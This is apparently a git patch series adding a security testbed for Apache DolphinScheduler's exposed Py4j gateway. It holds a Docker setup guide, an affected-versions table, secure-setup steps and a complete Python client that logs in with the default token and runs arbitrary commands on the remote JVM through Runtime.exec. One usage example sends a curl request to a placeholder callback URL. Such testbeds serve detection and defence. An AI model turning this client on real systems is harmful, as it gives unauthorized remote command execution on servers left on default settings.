From 343e25c8d608fa4e26136fb42905ea974f3c99da Mon Sep 17 00:00:00 2001 From: hayageek Date: Fri, 20 Feb 2026 18:21:42 +0530 Subject: [PATCH 1/4] new: dolphin scheduler exposed py4j gateway testbed --- apache/dolphin_scheduler/README.md | 46 ++++ .../dolphin_scheduler/py4j_gateway_client.py | 237 ++++++++++++++++++ 2 files changed, 283 insertions(+) create mode 100644 apache/dolphin_scheduler/README.md create mode 100644 apache/dolphin_scheduler/py4j_gateway_client.py diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md new file mode 100644 index 00000000..f93ca597 --- /dev/null +++ b/apache/dolphin_scheduler/README.md @@ -0,0 +1,46 @@ +# Apache DolphinScheduler + +Follow these steps to set up a testbed for Apache DolphinScheduler: + +1. **Set the DolphinScheduler Version**: + For this setup, we're using version 3.1.5. + + ```bash + export DOLPHINSCHEDULER_VERSION=3.1.5 + ``` + +2. **Run DolphinScheduler Standalone**: + Run the following command to start the DolphinScheduler Standalone environment. + + ```bash + docker run --name dolphinscheduler-standalone-server -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + ``` + This setup makes the DolphinScheduler UI accessible at `http://localhost:12345/dolphinscheduler` and exposes the Py4j Gateway on port **25333**. + +# Steps to reproduce + +1. Execute the `py4j_gateway_client.py` script to perform RCE. No extra dependencies required (Python 3 standard library only). + +```bash +python3 py4j_gateway_client.py [command] +``` + +Usage examples: + +```bash +# Default: runs `id` +python3 py4j_gateway_client.py + +# Custom command +python3 py4j_gateway_client.py "whoami" + +# Curl +python3 py4j_gateway_client.py "curl CALLBACK_URL" + +# Override host/port (add `--token <token>` to override the default auth token) +python3 py4j_gateway_client.py --host 127.0.0.1 --port 25333 "hostname" +``` + +#### How RCE executed ? 
+ +The `py4j_gateway_client.py` script connects to the DolphinScheduler Java Gateway on port 25333 (Py4j protocol over TCP), authenticates with the default token, and sends Py4j protocol messages to invoke `Runtime.getRuntime().exec(command)` on the remote JVM. The command runs with the privileges of the DolphinScheduler process. Output is captured from the process stdout/stderr. diff --git a/apache/dolphin_scheduler/py4j_gateway_client.py b/apache/dolphin_scheduler/py4j_gateway_client.py new file mode 100644 index 00000000..e285412f --- /dev/null +++ b/apache/dolphin_scheduler/py4j_gateway_client.py @@ -0,0 +1,237 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Minimal Py4j protocol client for authenticating with DolphinScheduler's Java Gateway +and executing commands on the remote JVM. + +No external dependencies required — uses only the Python standard library. 
+""" + +import socket +import sys + +AUTH_COMMAND = "A\n" +SUCCESS_PREFIX = "!y" +ERROR_PREFIX = "!x" +CALL_COMMAND = "c\n" +STATIC_PREFIX = "z:" +STRING_TYPE = "s" +REFERENCE_TYPE = "r" +END_COMMAND = "e\n" +RUNTIME_CLASS = "java.lang.Runtime" +SOCKET_TIMEOUT = 10.0 + + +def _escape(s): + return s.replace("\\", "\\\\").replace("\r", "\\r").replace("\n", "\\n") + + +def _unescape(s): + return s.replace("\\\\", "\x00").replace("\\n", "\n").replace("\\r", "\r").replace("\x00", "\\") + + +class Py4jGatewayClient: + def __init__(self, host, port, auth_token): + self.host = host + self.port = port + self.auth_token = auth_token + + def _connect(self): + """Create a socket and return (socket, rfile, wfile).""" + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(SOCKET_TIMEOUT) + sock.connect((self.host, self.port)) + rfile = sock.makefile("r", encoding="utf-8") + return sock, rfile + + def _send(self, sock, data): + sock.sendall(data.encode("utf-8")) + + def _readline(self, rfile): + line = rfile.readline() + if not line: + return None + return line.rstrip("\n") + + def _read_response(self, rfile): + """Parse a Py4j response. 
Returns the object ID (for references) or value string.""" + line = self._readline(rfile) + if line is None or line.startswith(ERROR_PREFIX): + return None + if line.startswith(SUCCESS_PREFIX) and len(line) > 2: + typ = line[2] + value = line[3:] + if typ == REFERENCE_TYPE: + return value + return value if value else None + return None + + def _read_string_response(self, rfile): + """Parse a Py4j response expecting a string value.""" + line = self._readline(rfile) + if line is None or line.startswith(ERROR_PREFIX): + return None + if line.startswith(SUCCESS_PREFIX) and len(line) > 2 and line[2] == "s": + return _unescape(line[3:]) + return None + + def _authenticate(self, sock, rfile): + self._send(sock, AUTH_COMMAND) + self._send(sock, self.auth_token + "\n") + line = self._readline(rfile) + return line is not None and line.startswith(SUCCESS_PREFIX) + + def authenticate(self): + """Test authentication against the gateway. Returns True on success.""" + try: + sock, rfile = self._connect() + try: + return self._authenticate(sock, rfile) + finally: + rfile.close() + sock.close() + except OSError as e: + print(f"Unable to connect to Java Gateway at {self.host}:{self.port}", file=sys.stderr) + return False + + def run_shell_script(self, script): + """Execute a command on the remote JVM. 
Returns True if successfully invoked.""" + if not script: + return False + try: + sock, rfile = self._connect() + try: + if not self._authenticate(sock, rfile): + return False + + # Runtime.getRuntime() + self._send(sock, CALL_COMMAND + STATIC_PREFIX + RUNTIME_CLASS + "\ngetRuntime\n" + END_COMMAND) + runtime_ref = self._read_response(rfile) + if runtime_ref is None: + return False + + # runtime.exec(script) + self._send(sock, CALL_COMMAND + runtime_ref + "\nexec\n" + STRING_TYPE + _escape(script) + "\n" + END_COMMAND) + return self._read_response(rfile) is not None + finally: + rfile.close() + sock.close() + except OSError: + return False + + def run_shell_script_with_output(self, script): + """Execute a command and return stdout+stderr by reading process streams.""" + if not script: + return None + try: + sock, rfile = self._connect() + try: + if not self._authenticate(sock, rfile): + return None + + # Runtime.getRuntime() + self._send(sock, CALL_COMMAND + STATIC_PREFIX + RUNTIME_CLASS + "\ngetRuntime\n" + END_COMMAND) + runtime_ref = self._read_response(rfile) + if runtime_ref is None: + return None + + # runtime.exec(script) + self._send(sock, CALL_COMMAND + runtime_ref + "\nexec\n" + STRING_TYPE + _escape(script) + "\n" + END_COMMAND) + process_ref = self._read_response(rfile) + if process_ref is None: + return None + + result = self._read_process_output(sock, rfile, process_ref) + + # exitValue() + self._send(sock, CALL_COMMAND + process_ref + "\nexitValue\n" + END_COMMAND) + self._read_response(rfile) + + return result + finally: + rfile.close() + sock.close() + except OSError: + return None + + def _read_stream_via_scanner(self, sock, rfile, stream_ref): + """Read all content from a stream using new Scanner(stream).useDelimiter("\\A").""" + # new Scanner(inputStream) + self._send(sock, "i\njava.util.Scanner\n" + REFERENCE_TYPE + stream_ref + "\n" + END_COMMAND) + scanner_ref = self._read_response(rfile) + if scanner_ref is None: + return None + + # 
scanner.useDelimiter("\\A") + self._send(sock, CALL_COMMAND + scanner_ref + "\nuseDelimiter\n" + STRING_TYPE + _escape("\\A") + "\n" + END_COMMAND) + self._read_response(rfile) + + # scanner.hasNext() + self._send(sock, CALL_COMMAND + scanner_ref + "\nhasNext\n" + END_COMMAND) + has_next_line = self._readline(rfile) + if has_next_line is None or has_next_line.startswith(ERROR_PREFIX): + return None + if has_next_line != "!ybtrue": + return "" + + # scanner.next() + self._send(sock, CALL_COMMAND + scanner_ref + "\nnext\n" + END_COMMAND) + return self._read_string_response(rfile) + + def _read_process_output(self, sock, rfile, process_ref): + """Read stdout and stderr from a Process reference.""" + # process.getInputStream() → stdout + self._send(sock, CALL_COMMAND + process_ref + "\ngetInputStream\n" + END_COMMAND) + stdout_ref = self._read_response(rfile) + stdout = self._read_stream_via_scanner(sock, rfile, stdout_ref) if stdout_ref else None + + # process.getErrorStream() → stderr + self._send(sock, CALL_COMMAND + process_ref + "\ngetErrorStream\n" + END_COMMAND) + stderr_ref = self._read_response(rfile) + stderr = self._read_stream_via_scanner(sock, rfile, stderr_ref) if stderr_ref else None + + parts = [] + if stdout: + parts.append(stdout) + if stderr: + parts.append(f"[stderr] {stderr}") + return "\n".join(parts) if parts else "" + + +if __name__ == "__main__": + import argparse + + parser = argparse.ArgumentParser(description="Py4j Gateway Client — execute commands on a remote JVM") + parser.add_argument("--host", default="127.0.0.1", help="Gateway host (default: 127.0.0.1)") + parser.add_argument("--port", type=int, default=25333, help="Gateway port (default: 25333)") + parser.add_argument("--token", default="jwUDzpLsNKEFER4*a8gruBH_GsAurNxU7A@Xc", help="Auth token") + parser.add_argument("command", nargs="?", default="id", help="Command to execute (default: id)") + args = parser.parse_args() + + client = Py4jGatewayClient(args.host, args.port, args.token) 
+ + if not client.authenticate(): + print("Failed to authenticate with Java Gateway", file=sys.stderr) + sys.exit(1) + + output = client.run_shell_script_with_output(args.command) + if output is None: + print("Command failed (protocol error)", file=sys.stderr) + sys.exit(1) + elif output: + print(output) + else: + print("(empty output)", file=sys.stderr) From ddb3cc52499245ea8ed458efc2553d4ee81318ac Mon Sep 17 00:00:00 2001 From: hayageek Date: Thu, 26 Feb 2026 16:28:47 +0530 Subject: [PATCH 2/4] Added instructions to setup secure py4j --- apache/dolphin_scheduler/README.md | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index f93ca597..5db6fde8 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -13,7 +13,7 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: Run the following command to start the DolphinScheduler Standalone environment. ```bash - docker run --name dolphinscheduler-standalone-server -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + docker run -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" ``` This setup makes the DolphinScheduler UI accessible at `http://localhost:12345/dolphinscheduler` and exposes the Py4j Gateway on port **25333**. @@ -44,3 +44,17 @@ python3 py4j_gateway_client.py --host 127.0.0.1 --port 25333 "hostname" #### How RCE executed ? The `py4j_gateway_client.py` script connects to the DolphinScheduler Java Gateway on port 25333 (Py4j protocol over TCP), authenticates with the default token, and sends Py4j protocol messages to invoke `Runtime.getRuntime().exec(command)` on the remote JVM. The command runs with the privileges of the DolphinScheduler process. Output is captured from the process stdout/stderr. 
+ + + +# Secure setup (non-default credentials): + +Below are the instructions to set up a secure Py4j gateway that uses a custom token to prevent unauthorized command execution (legitimate clients must then pass the same token, e.g. via `--token`). + + ```bash + export GATEWAY_TOKEN="your-secure-token-here" + ``` + + ```bash + docker run -p 12345:12345 -p 25333:25333 -e API_PYTHON_GATEWAY_AUTH_TOKEN="${GATEWAY_TOKEN}" -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + ``` From a8da02a67c03d23527cc5966cba26fe5787f6143 Mon Sep 17 00:00:00 2001 From: hayageek Date: Thu, 26 Feb 2026 23:06:56 +0530 Subject: [PATCH 3/4] Affected Versions added --- apache/dolphin_scheduler/README.md | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index 5db6fde8..5ca6bf9f 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -3,12 +3,28 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: 1. **Set the DolphinScheduler Version**: - For this setup, we're using version 3.1.5. + For this setup, we're using version 3.3.2. ```bash - export DOLPHINSCHEDULER_VERSION=3.1.5 + export DOLPHINSCHEDULER_VERSION=3.3.2 ``` +#### Affected Versions + +| Version | Release | Py4j Gateway Exploitable | +|---------------|-----------|--------------------------| +| 3.1.5 | ~4 years ago | Yes | +| 3.1.9 | ~2 years ago | Yes | +| 3.2.1 | ~2 years ago | Yes | +| 3.2.2 | >1 year ago | Yes | +| 3.3.0-alpha | 11 months ago | Yes | +| 3.3.1 | 6 months ago | Yes | +| 3.3.2 | 4 months ago | Yes | +| 3.4.0 | 1 month ago | No (gateway disabled by default) | + + + + 2. **Run DolphinScheduler Standalone**: Run the following command to start the DolphinScheduler Standalone environment. 
From 9638e38d3037e87cd14b079f3953a0f6dcb13912 Mon Sep 17 00:00:00 2001 From: hayageek Date: Fri, 27 Feb 2026 14:30:23 +0530 Subject: [PATCH 4/4] Release dates added --- apache/dolphin_scheduler/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index 5ca6bf9f..f7c634da 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -11,16 +11,16 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: #### Affected Versions -| Version | Release | Py4j Gateway Exploitable | +| Version | Release Date | Py4j Gateway Exploitable | |---------------|-----------|--------------------------| -| 3.1.5 | ~4 years ago | Yes | -| 3.1.9 | ~2 years ago | Yes | -| 3.2.1 | ~2 years ago | Yes | -| 3.2.2 | >1 year ago | Yes | -| 3.3.0-alpha | 11 months ago | Yes | -| 3.3.1 | 6 months ago | Yes | -| 3.3.2 | 4 months ago | Yes | -| 3.4.0 | 1 month ago | No (gateway disabled by default) | +| 3.1.5 | Apr 3, 2023 | Yes | +| 3.1.9 | Dec 22, 2023 | Yes | +| 3.2.1 | Feb 7, 2024 | Yes | +| 3.2.2 | Jul 18, 2024 | Yes | +| 3.3.0-alpha | Apr 8, 2025 | Yes | +| 3.3.1 | Aug 25, 2025 | Yes | +| 3.3.2 | Oct 26, 2025 | Yes | +| 3.4.0 | Jan 20, 2026 | No (gateway disabled by default) |